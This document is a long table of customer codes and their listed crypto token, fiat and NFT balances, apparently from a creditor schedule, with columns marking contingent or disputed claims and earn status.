| 07339696 | | AAVE[.5215325], ALGO[81.43498962], AVAX[1.72504683], BAT[84.36637425], BCH[.27535055], BRZ[9.12414097], CUSDT[24], DAI[.00000001], DOGE[3], ETHW[0.06277397], GRT[348.24422002], LINK[6.36385005], MATIC[261.39356392], MKR[.03811395], NEAR[9.59397989], NFT (480228676300307426/Crystal Face #21)[1], SHIB[11], SOL[1.24017221], SUSHI[16.22500096], TRX[596.12445662], UNI[6.20558836], USD[0.01], USDT[0] | Yes | |
| 07339697 | | DOGE[16.79462011], USD[0.00] | | |
| 07339698 | | BCH[.0007487], BRZ[1], BTC[.00444641], CUSDT[1], DOGE[4614.75695216], ETH[.11297928], ETHW[.11186538], LTC[.14091564], USD[0.19] | Yes | |
| 07339699 | | BRZ[1], USD[0.01] | | |
| 07339700 | | DOGE[43.29909673], USD[40.00] | | |
| 07339701 | | USD[10.00] | | |
| 07339702 | | USD[10.00] | | |
| 07339703 | | DOGE[60.85672076], SHIB[1], USD[890.01] | | |
| 07339704 | | BRZ[1], CUSDT[3], TRX[3], USD[0.00] | | |
| 07339705 | | USD[10.00] | | |
| 07339706 | | USD[10.00] | | |
| 07339707 | | USD[0.00] | | |
| 07339708 | | CUSDT[7], DOGE[.00594628], TRX[1], USD[0.00] | | |
| 07339709 | | USD[10.00] | | |
| 07339710 | | USD[10.00] | | |
| 07339711 | | USD[10.00] | | |
| 07339712 | | DOGE[7627.68021704], SHIB[1], TRX[1], USD[0.00] | | |
| 07339713 | | BRZ[2], CUSDT[10], DOGE[.00000644], SUSHI[.00001403], TRX[1653.00102754], USD[0.00] | | |
| 07339714 | | USD[10.00] | | |
| 07339715 | | USD[10.00] | | |
| 07339716 | | SHIB[1], USD[0.01] | | |
| 07339717 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339719 | | CUSDT[1], DOGE[25198.21929385], TRX[2], USD[0.00] | | |
| 07339720 | | CUSDT[1], SUSHI[.00107212], USD[0.78] | | |
| 07339721 | | USD[10.00] | | |
| 07339722 | | USD[10.00] | | |
| 07339723 | Contingent, Disputed | BTC[0], USD[0.01] | | |
| 07339724 | | BRZ[1], DOGE[1], ETH[0], SOL[0] | Yes | |
| 07339725 | | DOGE[1], USD[0.01] | | |
| 07339727 | | DOGE[1], ETH[0], USD[0.00] | | |
| 07339728 | | USD[10.00] | | |
| 07339729 | | DOGE[646.87961836], USD[0.00] | | |
| 07339730 | | BAT[2], BRZ[1], BTC[0], DOGE[2], ETH[0], ETHW[0], GRT[2], LTC[0], MATIC[0], NEAR[0], NFT (433010750047585756/DRIP NFT)[1], SHIB[4], SOL[27.91192380], TRX[15.00021974], USD[0.00], USDT[1.00045669], YFI[0] | Yes | |
| 07339731 | | CUSDT[1], LTC[.65663142], TRX[1], USD[0.00] | | |
| 07339732 | | USD[10.00] | | |
| 07339733 | | CUSDT[2], DOGE[1.03265111], TRX[1], USD[0.01] | | |
| 07339734 | | BRZ[1], SHIB[1], TRX[1.000001], USD[0.00] | Yes | |
| 07339735 | | DOGE[246.16674405], USD[10.00] | | |
| 07339736 | | USD[10.00] | | |
| 07339737 | | CUSDT[3], DOGE[0], TRX[2], USD[0.00], USDT[0] | | |
| 07339738 | | SHIB[7574610.90758975], USD[2183.70], USDT[0.00000001] | | |
| 07339739 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07339740 | | BAT[1.00126001], DOGE[3], GRT[1], SOL[0], SUSHI[1.08317597], TRX[2], UNI[0], USD[0.00], USDT[4.28174220] | Yes | |
| 07339742 | | USD[10.00] | | |
| 07339743 | | USD[10.00] | | |
| 07339744 | | DOGE[41.34130029], USD[0.00] | | |
| 07339745 | | BAT[2.11701136], BCH[0], BTC[0], CUSDT[3], DOGE[8.45714829], ETH[0], GRT[2.07018951], LINK[0], SOL[0], SUSHI[0], TRX[10.1079756], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07339746 | | CUSDT[2], DOGE[72.14366599], TRX[.04340314], USD[0.00] | | |
| 07339747 | | USD[10.00] | | |
| 07339748 | | UNI[0], USD[0.08] | | |
| 07339749 | | USD[10.00] | | |
| 07339750 | | USD[10.00] | | |
| 07339751 | | USD[0.00], USDT[0.00000001] | | |
| 07339752 | | BRZ[3], CUSDT[4], DOGE[1.47916992], USD[0.00] | | |
| 07339753 | | BTC[.00021413], CUSDT[1], DOGE[994.11208344], TRX[66.32309094], USD[0.00] | | |
| 07339755 | | BTC[.00020716], USD[0.00] | | |
| 07339756 | | BTC[.00042419], DOGE[1], ETH[.01526707], ETHW[.01526707], USD[10.00] | | |
| 07339758 | | BRZ[2], BTC[0], CUSDT[37], DOGE[0], ETH[0], GRT[2], SUSHI[0], TRX[11], UNI[0], USD[0.00], USDT[2] | | |
| 07339759 | | USD[10.00] | | |
| 07339760 | | USD[10.00] | | |
| 07339761 | | USD[10.00] | | |
| 07339763 | | USD[10.00] | | |
| 07339764 | | USD[10.00] | | |
| 07339765 | | BRZ[1], CUSDT[1], DOGE[1], ETH[0], ETHW[0], GRT[1.00498957], USD[0.00] | Yes | |
| 07339766 | | BRZ[1], CUSDT[1], DOGE[.00004881], USD[0.00] | | |
| 07339768 | | DOGE[4.30723413], USD[0.00] | | |
| 07339769 | | BTC[0], CUSDT[1], SUSHI[0], USD[0.00] | Yes | |
| 07339770 | | BRZ[2], CUSDT[8], TRX[3], USD[0.00] | Yes | |
| 07339771 | | USD[10.00] | | |
| 07339772 | Contingent, Disputed | BAT[0], BTC[0], DAI[0], DOGE[2], ETH[0], SUSHI[0], TRX[4], USD[0.00] | | |
| 07339773 | | USD[10.00] | | |
| 07339774 | | DOGE[1], GRT[.00004859], LTC[0], USD[0.00] | | |
| 07339775 | | BRZ[1], CUSDT[3], DOGE[0], SOL[0], SUSHI[0], TRX[2], USD[0.00], USDT[0.00000001] | | |
| 07339776 | | DOGE[1], USD[0.01], USDT[1] | | |
| 07339777 | | USD[10.00] | | |
| 07339778 | | USD[10.00] | | |
| 07339779 | | CUSDT[5], DOGE[122.83393852], LTC[.22191245], SOL[.3254125], TRX[179.94268825], USD[0.43] | | |
| 07339781 | | BRZ[1], BTC[.022156], CUSDT[2], DOGE[3495.34256262], ETH[.03218683], ETHW[.03218683], TRX[3], USD[34.97] | | |
| 07339782 | | USD[0.00] | | |
| 07339783 | | BRZ[2], BTC[.03889699], CUSDT[8], DOGE[19850.33912212], ETH[.32320632], ETHW[.18372849], GRT[1525.01528642], SHIB[21631312.1641027], TRX[6], USD[1216.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339784 | | USD[0.00] | | |
| 07339785 | | CUSDT[2], DOGE[1], SHIB[1], USD[0.00] | Yes | |
| 07339786 | | USD[0.00], USDT[0.00000001] | | |
| 07339787 | | USD[10.00] | | |
| 07339788 | | USD[10.00] | | |
| 07339789 | | BTC[0], DOGE[0], USD[0.00] | Yes | |
| 07339790 | | TRX[1], USD[0.00] | | |
| 07339791 | | DOGE[.00006732], USD[0.74] | | |
| 07339793 | | DOGE[14.56612727], TRX[68.79231716], USD[0.00] | | |
| 07339794 | | USD[10.00] | | |
| 07339795 | | DAI[9.92027905], USD[0.00] | | |
| 07339796 | | USD[10.00] | | |
| 07339797 | | USD[10.00] | | |
| 07339798 | | USD[10.00] | | |
| 07339799 | | USD[0.00], USDT[9.94606151] | | |
| 07339800 | | USD[10.00] | | |
| 07339803 | | USD[10.00] | | |
| 07339804 | | USD[10.00] | | |
| 07339805 | | USD[10.00] | | |
| 07339806 | | USD[10.00] | | |
| 07339807 | | CUSDT[2], DOGE[0], USD[0.00] | Yes | |
| 07339808 | | USD[10.00] | | |
| 07339809 | | USD[10.00] | | |
| 07339810 | | BRZ[0], DOGE[19.02975736], USD[0.00] | | |
| 07339811 | Contingent, Disputed | SOL[0], USD[0.00], USDT[0] | Yes | |
| 07339812 | | USD[10.00] | | |
| 07339813 | | CUSDT[2], DOGE[1], TRX[2], USD[0.00] | | |
| 07339814 | | AUD[0.00], BCH[0], BRZ[0], BTC[0], CUSDT[4], DOGE[0.10657411], ETH[0], EUR[0.00], GRT[0], KSHIB[0], LINK[0], LTC[0], SHIB[407960.42510343], SOL[0], SUSHI[0], TRX[2], USD[10.08] | Yes | |
| 07339815 | | BAT[0], BCH[0], BRZ[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0.05931121], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07339816 | | USD[0.00] | | |
| 07339817 | | USD[10.00] | | |
| 07339818 | | USD[10.00] | | |
| 07339819 | | BRZ[2], CUSDT[972.88999901], DOGE[4370.21081436], SHIB[1], TRX[6], USD[0.00], USDT[0.00584453] | Yes | |
| 07339820 | | USD[10.00] | | |
| 07339821 | | USD[0.00] | Yes | |
| 07339822 | | USD[10.00] | | |
| 07339823 | | USD[10.00] | | |
| 07339824 | | BAT[1], BRZ[2], BTC[0], CUSDT[38], DOGE[119.72964390], ETH[0], KSHIB[0], SOL[0.35685279], TRX[3], UNI[0.48133615], USD[0.06] | | |
| 07339825 | | USD[10.00] | | |
| 07339826 | | BRZ[53.85503785], CUSDT[2], DOGE[2687.10769712], TRX[180.39884165], USD[0.00], USDT[24.76281825] | | |
| 07339827 | | ETH[.00627528], ETHW[.00627528], USD[0.00] | | |
| 07339828 | | DOGE[0], LTC[0], USD[0.00], USDT[0] | | |
| 07339829 | | USD[5.51] | | |
| 07339831 | | USD[10.00] | | |
| 07339832 | | DOGE[1], USD[0.00] | | |
| 07339833 | | CUSDT[2], ETH[.00454693], ETHW[.00449221], USD[0.00] | Yes | |
| 07339834 | | BAT[2], CUSDT[2], DOGE[6], GRT[1], LINK[2.73764642], LTC[.54106912], USD[0.01] | | |
| 07339836 | | BAT[1], BRZ[1], CUSDT[2], TRX[1], USD[0.00], USDT[0] | | |
| 07339837 | | TRX[1], USD[0.00] | | |
| 07339838 | | BTC[0], CUSDT[2], DOGE[0], TRX[1], USD[0.00], USDT[3] | | |
| 07339839 | | ETH[0], TRX[0], USD[0.01] | Yes | |
| 07339840 | | USD[10.00] | | |
| 07339841 | | DOGE[1], USD[0.00] | | |
| 07339842 | | BRZ[2], CUSDT[1], USD[0.00] | | |
| 07339843 | | CUSDT[1], DOGE[.00008393], TRX[1], USD[0.01] | | |
| 07339844 | | BTC[.0001729], USD[0.00] | Yes | |
| 07339846 | | USD[0.01] | | |
| 07339847 | | CUSDT[1], USD[0.00], USDT[1] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339849 | | USD[10.00] | | |
| 07339850 | | TRX[1], USD[0.01] | | |
| 07339851 | | USD[10.00] | | |
| 07339852 | | USD[10.00] | | |
| 07339853 | | BAT[0], CUSDT[2], TRX[2], USD[0.01], USDT[0] | | |
| 07339854 | | BRZ[1], CUSDT[5], DOGE[47112.37491113], SUSHI[5.79546463], TRX[10], USD[0.00] | | |
| 07339855 | | TRX[1], USD[0.00] | | |
| 07339856 | | CUSDT[3], DOGE[3], GRT[.00000319], TRX[2], USD[0.01] | | |
| 07339857 | | BAT[1], BTC[0.10226839], DOGE[1], ETH[.84949838], ETHW[.84949838], TRX[2], USD[2788.77], USDT[0.00014258] | | |
| 07339859 | | BAT[.00003048], BRZ[1.0000462], CUSDT[5], GRT[2], SHIB[5589043.09589041], USD[0.00], USDT[0] | | |
| 07339860 | | BAT[1], CUSDT[1], TRX[1], USD[10.00] | | |
| 07339861 | | DOGE[1], USD[0.00] | | |
| 07339863 | | BRZ[1], CUSDT[1], DOGE[18.2866218], TRX[1], USD[0.10], USDT[1] | | |
| 07339864 | | TRX[1], USD[0.00] | Yes | |
| 07339865 | | USD[10.00] | | |
| 07339866 | | USD[10.00] | | |
| 07339868 | | USD[0.00] | | |
| 07339869 | | BRZ[2], CUSDT[22], GRT[1.00367791], SOL[.00000001], TRX[4], USD[0.00] | Yes | |
| 07339870 | | CUSDT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07339871 | | USD[10.00] | | |
| 07339872 | | BAT[1], CUSDT[2], USD[0.00] | | |
| 07339873 | | USD[10.00] | | |
| 07339874 | | USD[10.00] | | |
| 07339875 | | USD[0.01] | | |
| 07339876 | | USD[10.00] | | |
| 07339877 | | USD[10.19] | Yes | |
| 07339878 | | DOGE[2], GRT[1], USD[0.04] | | |
| 07339879 | | BAT[6.30662959], BTC[.00012079], DOGE[57.02570205], SOL[.36954927], TRX[44.89632764], USD[0.00], USDT[2.00970708] | | |
| 07339880 | | USD[0.01] | | |
| 07339881 | | USD[10.00] | | |
| 07339882 | | USD[10.00] | | |
| 07339883 | | USD[10.00] | | |
| 07339884 | | USD[10.00] | | |
| 07339885 | | USD[10.00] | | |
| 07339886 | | BRZ[1], CUSDT[4], TRX[3], USD[0.01] | | |
| 07339887 | | BRZ[36.72639107], CUSDT[7], DOGE[996.18439152], TRX[184.1377615], USD[0.22] | | |
| 07339888 | | USD[10.00] | | |
| 07339890 | | USD[10.00] | | |
| 07339891 | | USD[0.00] | Yes | |
| 07339892 | | BTC[0], ETH[.00000001], ETHW[0.02973925], SHIB[3], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07339893 | | CUSDT[2], ETH[.00000003], ETHW[.00000003], USD[12.42] | Yes | |
| 07339894 | | BRZ[1], CUSDT[3], DOGE[8.34665846], TRX[31.62319291], USD[0.00] | Yes | |
| 07339895 | | BAT[1.01655549], BRZ[1], CUSDT[1], TRX[3], USD[0.86] | Yes | |
| 07339896 | | USD[0.00] | | |
| 07339897 | | DOGE[1], MATIC[0], SHIB[2], SOL[.49693516], SUSHI[0], USD[0.00] | Yes | |
| 07339898 | | BAT[1], BTC[.00001213], CUSDT[1], TRX[2], USD[0.00], USDT[2] | | |
| 07339899 | | USD[10.00] | | |
| 07339900 | | BCH[.00790075], DOGE[179.96405757], TRX[1], USD[73.39] | | |
| 07339901 | | CUSDT[1], DOGE[0], GRT[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07339902 | | AVAX[.65205408], BAT[20.12268802], BRZ[1], CUSDT[1], DOGE[294.1260251], ETH[.02711631], ETHW[.02711631], LINK[1.0011529], SHIB[1], USD[45.89] | | |
| 07339903 | | USD[10.00] | | |
| 07339904 | | USD[10.00] | | |
| 07339906 | | USD[10.00] | | |
| 07339907 | | USD[10.00] | | |
| 07339908 | | USD[0.00] | | |
| 07339909 | | USD[10.00] | | |
| 07339910 | | USD[10.00] | | |
| 07339911 | Contingent, Disputed | BRZ[1], BTC[0], CUSDT[10], DOGE[0.03829915], SHIB[266240.95630235], SOL[4.87474871], TRX[4], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339912 | | BAT[1], BRZ[1], CUSDT[5], ETH[0], TRX[1], USD[0.00] | | |
| 07339913 | | USD[10.00] | | |
| 07339914 | | USD[10.00] | | |
| 07339916 | | USD[10.00] | | |
| 07339917 | | USD[10.00] | | |
| 07339918 | | USD[10.00] | | |
| 07339919 | | USD[10.98] | Yes | |
| 07339920 | | USD[10.00] | | |
| 07339922 | | TRX[1], USD[65.24] | | |
| 07339924 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SHIB[79.67439291], USD[0.01], USDT[0] | Yes | |
| 07339925 | | DOGE[3370.52733242], ETH[.00000001], USD[0.00], USDT[0.00000001] | | |
| 07339926 | | USD[10.00] | | |
| 07339927 | | DOGE[2390.57834407], USD[10.00] | | |
| 07339928 | | USD[10.00] | | |
| 07339929 | | USD[10.00] | | |
| 07339930 | | USD[10.00] | | |
| 07339931 | | USD[10.00] | | |
| 07339932 | | TRX[1], USD[0.00] | | |
| 07339933 | | BAT[1], BRZ[1], CUSDT[3], DOGE[1], USD[0.01] | | |
| 07339934 | | USD[0.00] | | |
| 07339935 | | DOGE[0], ETH[0], USD[0.54], USDT[0] | Yes | |
| 07339936 | | USD[10.00] | | |
| 07339937 | | CUSDT[2], DOGE[16.47486979], USD[0.00] | | |
| 07339938 | | USD[10.00] | | |
| 07339939 | | USD[10.00] | | |
| 07339940 | | USD[10.00] | | |
| 07339941 | | USD[10.00] | | |
| 07339942 | | BRZ[1], CUSDT[5], DAI[5.44963777], GRT[1.00498957], TRX[1], USD[0.00], USDT[10.95807886] | Yes | |
| 07339943 | | USD[10.00] | | |
| 07339944 | | BTC[0], DOGE[1607.30934040], ETH[0], USD[0.00] | | |
| 07339945 | | BTC[.00001334], ETH[.000948], ETHW[.000948], GRT[.828], SUSHI[.472], TRX[.368], USD[0.01] | | |
| 07339946 | | BAT[3.27836337], BTC[.00019331], CUSDT[545.64711212], DOGE[108.52278018], GRT[1.57333053], KSHIB[147.37146776], SHIB[78367.37254256], TRX[67.15910863], USD[0.00] | Yes | |
| 07339947 | | USD[10.00] | | |
| 07339948 | | USD[10.00] | | |
| 07339949 | | TRX[83.35173322], USD[0.00] | | |
| 07339950 | | CUSDT[3], USD[0.00] | | |
| 07339951 | | TRX[0], USD[0.00] | | |
| 07339952 | | CUSDT[16.96438092], DOGE[0], ETH[0], TRX[3], USD[0.00] | | |
| 07339953 | | USD[10.00] | | |
| 07339954 | | USD[10.00] | | |
| 07339956 | | USD[10.00] | | |
| 07339957 | | BAT[1.0165555], BRZ[2], CUSDT[2583.29877412], DOGE[181.09220849], GRT[154.4786219], LINK[1.58762862], LTC[.24925295], SHIB[1], TRX[611.72829166], USD[0.01], USDT[2.21739684] | Yes | |
| 07339958 | | DOGE[0.00035521], TRX[1], USD[0.11] | | |
| 07339959 | | USD[10.00] | | |
| 07339960 | | BRZ[1], CUSDT[3], DOGE[2075.38422635], ETH[.00724431], ETHW[.00724431], TRX[1], USD[0.00] | | |
| 07339961 | | USD[10.00] | | |
| 07339962 | | BAT[1], BRZ[2], CUSDT[1], DOGE[13729.34395724], LTC[5.26133241], TRX[2], USD[0.00] | Yes | |
| 07339963 | | GRT[11.05778184], USD[0.00] | Yes | |
| 07339964 | | USD[10.00] | | |
| 07339965 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07339966 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07339967 | | BRZ[1], BTC[.00021473], CUSDT[4958.68103257], DOGE[8801.89047788], SHIB[7580626.6796838], USD[0.00] | Yes | |
| 07339968 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07339969 | | USD[10.00] | | |
| 07339970 | | USD[10.00] | | |
| 07339971 | | USD[10.00] | | |
| 07339972 | | SOL[.31050921], TRX[1], USD[0.00] | Yes | |
| 07339973 | | DAI[10.48025017], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07339974 | | USD[10.00] | | |
| 07339975 | | USD[10.00] | | |
| 07339976 | | USD[10.00] | | |
| 07339977 | | USD[10.00] | | |
| 07339978 | | USD[10.00] | | |
| 07339979 | | DOGE[54.73881592], USD[0.00] | | |
| 07339980 | | USD[10.00] | | |
| 07339981 | | CUSDT[1], GRT[1], MATIC[11.23324658], USD[0.00] | | |
| 07339982 | | LINK[.31099958], USD[0.00] | | |
| 07339983 | | USD[10.00] | | |
| 07339984 | | DOGE[930.64744535], SUSHI[1.984278], TRX[1], USD[0.00] | | |
| 07339985 | | CUSDT[1], DOGE[62.84705793], USD[200.59] | | |
| 07339987 | | USD[10.00] | | |
| 07339988 | | BRZ[.00002004], CUSDT[8], TRX[1.14409887], USD[0.01], USDT[0.00009286] | | |
| 07339989 | | BRZ[1], CUSDT[4], DOGE[1.00002809], TRX[2], USD[0.01] | | |
| 07339991 | | USD[10.00] | | |
| 07339992 | | BRZ[1], BTC[0.00000009], CUSDT[1], DOGE[0], ETH[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07339993 | | USD[10.00] | | |
| 07339994 | | CUSDT[1], DOGE[14.91546792], LINK[.01918041], USD[0.00] | Yes | |
| 07339995 | | USD[10.00] | | |
| 07339996 | | BAT[1], BRZ[3], CUSDT[10], DOGE[1.34168468], GRT[2], LINK[.05809808], LTC[.04557113], SOL[.08843298], TRX[1.44528422], USD[0.00], USDT[1] | | |
| 07339997 | | USD[10.00] | | |
| 07339998 | | USD[10.00] | | |
| 07339999 | | CUSDT[1], USD[0.00] | | |
| 07340001 | | USD[10.00] | | |
| 07340002 | | BRZ[0], CUSDT[1], DOGE[3707.5776565], USD[0.00] | Yes | |
| 07340005 | | USD[10.00] | | |
| 07340006 | | CUSDT[5], ETH[0.24086639], ETHW[0.24086639], SHIB[1116214.9664721], TRX[2], USD[0.00], USDT[1] | | |
| 07340007 | | BTC[.00000001], CUSDT[2], DOGE[1], USD[0.00] | Yes | |
| 07340008 | | USD[10.00] | | |
| 07340009 | | USD[10.00] | | |
| 07340010 | | BTC[.2118273], ETH[0.00076245], ETHW[0.00076245], SOL[.0055], USD[1.44] | | |
| 07340011 | | LINK[.29057331], USD[0.00] | | |
| 07340012 | | DOGE[131.06180507], USD[0.00] | | |
| 07340013 | | USD[0.00] | | |
| 07340015 | | BAT[2.12557398], BRZ[2], CUSDT[13], DAI[109.87591681], DOGE[13672.40979876], ETH[.69761584], ETHW[.69732282], EUR[283.05], SHIB[3965026.27261638], SOL[2.16235481], SUSHI[8.9430391], TRX[465.63643325], UNI[5.53586161], USD[1508.84] | Yes | |
| 07340016 | Contingent, Disputed | USD[0.00] | Yes | |
| 07340017 | | USD[10.00] | | |
| 07340018 | | CUSDT[2], GRT[1], TRX[1], USD[0.00] | | |
| 07340019 | | BAT[2.12093957], CUSDT[6], DOGE[.36830937], ETH[.26500553], ETHW[.16733989], SHIB[11], TRX[4], USD[0.00] | Yes | |
| 07340020 | | USD[10.00] | | |
| 07340022 | | USD[10.00] | | |
| 07340025 | | USD[10.00] | | |
| 07340026 | | USD[10.00] | | |
| 07340027 | | DOGE[98.09712134], USD[0.00] | | |
| 07340028 | | USD[10.00] | | |
| 07340029 | | USD[10.00] | | |
| 07340030 | | ALGO[0], AVAX[0], BAT[0], BRZ[0], BTC[0.00000005], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[47.07703644], MATIC[0], NEAR[0], NFT [401933390383837452/ApexDucks #1755][1], NFT [441480480494758691/Sigma Shark #741][1], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000005], YFI[0] | Yes | |
| 07340031 | | USD[10.00] | | |
| 07340032 | | CUSDT[1], DOGE[50.12036535], USD[0.00] | | |
| 07340033 | | USD[10.00] | | |
| 07340034 | | USD[10.00] | | |
| 07340035 | | DOGE[1], GRT[4.07440545], USD[0.00] | Yes | |
| 07340036 | | BRZ[0.00002245], DOGE[2087.61608766], LTC[.38104877], USD[0.00] | | |
| 07340037 | | DOGE[0], TRX[1], USD[10.00] | | |
| 07340038 | | TRX[1], USD[0.01] | | |
| 07340039 | | CUSDT[1], DOGE[4.33754271], USD[0.01], USDT[0] | | |
| 07340040 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340041 | | USD[10.00] | | |
| 07340042 | | USD[10.00] | | |
| 07340043 | | BAT[3], CUSDT[2], DOGE[0], SUSHI[.00003656], TRX[5], USD[0.01], USDT[1] | | |
| 07340044 | | DOGE[933.11572999], USD[0.00] | | |
| 07340045 | | DOGE[84.02645488], USD[47.91] | | |
| 07340046 | | BTC[.00002008], CUSDT[1], USD[0.00] | | |
| 07340047 | | CUSDT[2], ETH[.00000001], TRX[3], USD[0.00] | Yes | |
| 07340048 | | USD[0.00] | | |
| 07340049 | | USD[10.00] | | |
| 07340050 | | USD[10.00] | | |
| 07340051 | | DOGE[1], USD[0.00] | | |
| 07340052 | | NFT (44050732976341704 2/Saudi Arabia Ticket Stub #126)[1], USD[11.10] | Yes | |
| 07340053 | Contingent, Disputed | BRZ[0], BTC[0], CUSDT[1], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07340054 | | USD[10.00] | | |
| 07340055 | | USD[10.00] | | |
| 07340056 | | USD[0.00] | | |
| 07340058 | | GRT[3.50098223], USD[0.00] | | |
| 07340059 | | DOGE[1], USD[0.00] | | |
| 07340061 | Contingent, Disputed | USD[0.00] | | |
| 07340062 | | ETH[.000763], ETHW[.000763], GRT[.7], LINK[.0953], SOL[.002], SUSHI[.482], USD[0.00], USDT[1.94684] | | |
| 07340063 | | USD[10.00] | | |
| 07340064 | | USD[0.00] | | |
| 07340065 | | BRZ[1], CUSDT[5], TRX[2], USD[0.86], USDT[1] | | |
| 07340066 | | USD[10.00] | | |
| 07340067 | | USD[0.00] | Yes | |
| 07340068 | | CUSDT[470.734204], DOGE[124.35723031], USD[0.25] | | |
| 07340069 | | DOGE[75.79283308], TRX[80.31405587], USD[0.79], USDT[.99467878] | Yes | |
| 07340070 | | DOGE[1], USD[0.01] | | |
| 07340071 | | BTC[.00959938], CUSDT[3], TRX[2], USD[0.00] | | |
| 07340072 | | USD[0.07] | | |
| 07340073 | | USD[10.00] | | |
| 07340074 | | CUSDT[2], DOGE[2878.05949391], TRX[566.27770397], USD[0.00], USDT[10.07162484] | | |
| 07340075 | | USD[0.00], USDT[0] | | |
| 07340076 | | DOGE[1233.55743387], TRX[1], USD[10.00] | | |
| 07340077 | | USD[10.00] | | |
| 07340079 | | BRZ[2], BTC[.00252905], CUSDT[2], DOGE[.00002015], ETH[.30897425], ETHW[.30878813], LTC[.92560694], SHIB[85128163.05785297], TRX[4], USD[0.00], USDT[1.10987346] | Yes | |
| 07340080 | | USD[10.00] | | |
| 07340081 | | BRZ[2], DOGE[2], TRX[4], USD[0.01] | | |
| 07340082 | | DOGE[2539.37773294], USD[0.00] | | |
| 07340083 | | DOGE[0.00171280], USD[0.00] | | |
| 07340084 | | USD[10.00] | | |
| 07340085 | | USD[10.00] | | |
| 07340086 | | DOGE[90.82817126], USD[12.50] | | |
| 07340087 | | BTC[0], DOGE[1], SUSHI[17.27659454], USD[0.00] | | |
| 07340088 | | CUSDT[2], USD[0.01] | | |
| 07340089 | | USD[10.00] | | |
| 07340090 | | USD[10.00] | | |
| 07340091 | | USD[0.01] | | |
| 07340092 | | USD[10.00] | | |
| 07340093 | | USD[10.00] | | |
| 07340094 | | USD[10.00] | | |
| 07340095 | | DOGE[191.21650795], USD[0.00] | | |
| 07340096 | | GRT[95.74689756], TRX[1], USD[0.00] | | |
| 07340098 | | BRZ[0], USD[0.00], USDT[0] | | |
| 07340099 | | USD[10.00] | | |
| 07340101 | | CUSDT[4], USD[0.19], USDT[0.00000001] | | |
| 07340102 | | CUSDT[10], DOGE[845.50229282], USD[0.00] | | |
| 07340103 | | DOGE[1], USD[25.84], USDT[0.00519252] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340104 | | USD[10.00] | | |
| 07340105 | | DOGE[1], USD[44.12] | | |
| 07340106 | | DOGE[183.94539323], USD[0.00] | | |
| 07340107 | | USD[10.00] | | |
| 07340108 | | USD[10.00] | | |
| 07340109 | | USD[0.00] | | |
| 07340110 | | BRZ[0], DOGE[15.01041214], USD[0.00] | Yes | |
| 07340111 | | USD[10.00] | | |
| 07340112 | | BAT[2], DOGE[1], USD[0.00], USDT[0] | | |
| 07340113 | | USD[10.00] | | |
| 07340115 | | USD[10.00] | | |
| 07340116 | | BTC[0], CAD[0.00], USD[0.00] | | |
| 07340117 | | CUSDT[1], USD[0.00] | | |
| 07340118 | | USD[10.00] | | |
| 07340119 | | USD[0.01] | | |
| 07340120 | | DOGE[0], SHIB[28012424.78641496], USD[0.00] | Yes | |
| 07340122 | | USD[10.00] | | |
| 07340123 | | DOGE[133.6963814], USD[0.00] | | |
| 07340124 | | BRZ[2], BTC[.01752056], CUSDT[10], DOGE[3995.39164896], ETH[.11348181], ETHW[.11236489], LTC[4.26307741], SHIB[21], SOL[25.67188353], USD[0.00] | Yes | |
| 07340125 | | USD[10.00] | | |
| 07340126 | | CUSDT[3], ETH[1.00001626], ETHW[1.00001626], LINK[39.2241391], TRX[5427.31000931], USD[0.00], USDT[1] | | |
| 07340127 | | USD[10.00] | | |
| 07340128 | | USD[10.00] | | |
| 07340129 | | BTC[0], DOGE[0], USD[0.01] | | |
| 07340130 | | BRZ[1], CUSDT[13], DOGE[4.05213569], ETH[.507923], ETHW[.50770492], SHIB[1], TRX[5], USD[0.00] | Yes | |
| 07340131 | | DOGE[192.57022014], LTC[.00000118], TRX[1.40771305], USD[0.00] | | |
| 07340132 | | USD[10.00] | | |
| 07340133 | | USD[10.00] | | |
| 07340134 | | USD[10.00] | | |
| 07340135 | | BAT[1], BRZ[1], CUSDT[1.00007646], DOGE[2.191808], TRX[3], USD[0.06] | | |
| 07340136 | | USD[10.00] | | |
| 07340137 | | USD[10.00] | | |
| 07340138 | | USD[10.00] | | |
| 07340139 | | USD[0.00] | | |
| 07340140 | | CUSDT[2], DOGE[1797.58923456], TRX[3], USD[0.00] | Yes | |
